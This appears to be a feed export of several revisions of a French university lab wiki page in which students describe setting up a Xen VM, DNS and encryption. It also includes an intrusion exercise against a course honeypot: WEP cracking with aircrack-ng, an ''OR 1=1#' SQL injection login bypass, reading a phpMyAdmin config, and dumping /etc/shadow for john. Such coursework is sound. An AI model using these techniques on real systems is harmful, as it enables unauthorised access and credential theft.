&lt;br /&gt;
On retrouver ainsi en créant le fichier  /etc/phpmyadmin/config-db.php&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de récupérer le fichier config-db.php&lt;br /&gt;
&lt;br /&gt;
Voici le contenu du fichier :&lt;br /&gt;
&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='*****';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306'; &lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
On disposait ainsi du mot de passe ainsi que de l'identifiant de la page http://honey.plil.info/phpmyadmin/&lt;br /&gt;
&lt;br /&gt;
en clair&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh sur la machine physique&lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    /etc/bind/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha:256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53735</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53735"/>
				<updated>2020-11-16T15:34:15Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
* Cassage de clef WEP d'un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
*  Intrusion sur un serveur d’application Web&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/index.php&lt;br /&gt;
&lt;br /&gt;
 admin	*****	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Une fois connecté avec les identifiants administrateurs que nous venions de récupérer,&lt;br /&gt;
&lt;br /&gt;
nous avons utilisé la technique de parcours de fichier.&lt;br /&gt;
&lt;br /&gt;
On retrouver ainsi en créant le fichier  /etc/phpmyadmin/config-db.php&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de récupérer le fichier config-db.php&lt;br /&gt;
&lt;br /&gt;
Voici le contenu du fichier :&lt;br /&gt;
&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='*****';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306'; &lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
On disposait ainsi du mot de passe ainsi que de l'identifiant de la page http://honey.plil.info/phpmyadmin/&lt;br /&gt;
&lt;br /&gt;
en clair&lt;br /&gt;
&lt;br /&gt;
L'étape suivante était de se connecter à cette dernière avec les identifiants récemment récupéré&lt;br /&gt;
&lt;br /&gt;
.... ajouter le chemin...&lt;br /&gt;
&lt;br /&gt;
Cela nous a permis de retrouver le fichier nous permettant de nous connecter à la base de données &lt;br /&gt;
&lt;br /&gt;
....&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous avons retrouvé les identifiants&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh &lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    /etc/bind/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha:256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53734</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53734"/>
				<updated>2020-11-16T15:31:14Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
* Cassage de clef WEP d'un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
*  Intrusion sur un serveur d’application Web&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/index.php&lt;br /&gt;
&lt;br /&gt;
 admin	*****	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Une fois connecté avec les identifiants administrateurs que nous venions de récupérer,&lt;br /&gt;
&lt;br /&gt;
nous avons utilisé la technique de parcours de fichier.&lt;br /&gt;
&lt;br /&gt;
On retrouver ainsi en créant le fichier  /etc/phpmyadmin/config-db.php&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de récupérer le fichier config-db.php&lt;br /&gt;
&lt;br /&gt;
Voici le contenu du fichier :&lt;br /&gt;
&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='*****';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306'; &lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
Une fois connectée à cette dernière nous avons cherché à trouver le chemin du fichier de mot de passe de php &lt;br /&gt;
&lt;br /&gt;
.... ajouter le chemin...&lt;br /&gt;
&lt;br /&gt;
Cela nous a permis de retrouver le fichier nous permettant de nous connecter à la base de données &lt;br /&gt;
&lt;br /&gt;
....&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous avons retrouvé les identifiants&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh &lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    /etc/bind/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha:256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53109</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=53109"/>
				<updated>2020-11-02T17:49:32Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
